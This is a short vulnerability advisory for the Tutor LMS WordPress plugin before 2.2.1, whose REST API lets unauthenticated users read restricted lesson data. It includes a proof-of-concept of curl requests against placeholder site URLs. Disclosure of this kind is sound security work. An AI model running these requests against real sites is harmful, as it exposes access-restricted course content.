Tutor LMS < 2.2.1 - Unauthenticated Access to Tutor LMS Lesson Resources via REST API

The plugin does not implement adequate permission checks for REST API endpoints, allowing unauthenticated attackers to access information from Lessons that should not be publicly available.

PoC

1. Create a new Course, add a Topic, and add a Lesson to the Topic. 2. In Tutor LMS > Settings > Course, ensure that “Course Visibility” is toggled to “On” (Students must be logged in to view course) 3. Run the following curl command to get the ID of the course: curl http://SITE_URL/wp-json/tutor/v1/courses 4. Using the Course ID, run the following curl command to get the ID of the Topic: curl http://SITE_URL/wp-json/tutor/v1/course-topic/ 5. Using the Topic ID, run the following curl command to get all of the data from the Lesson, without being logged in: curl http://SITE_URL/wp-json/tutor/v1/lesson/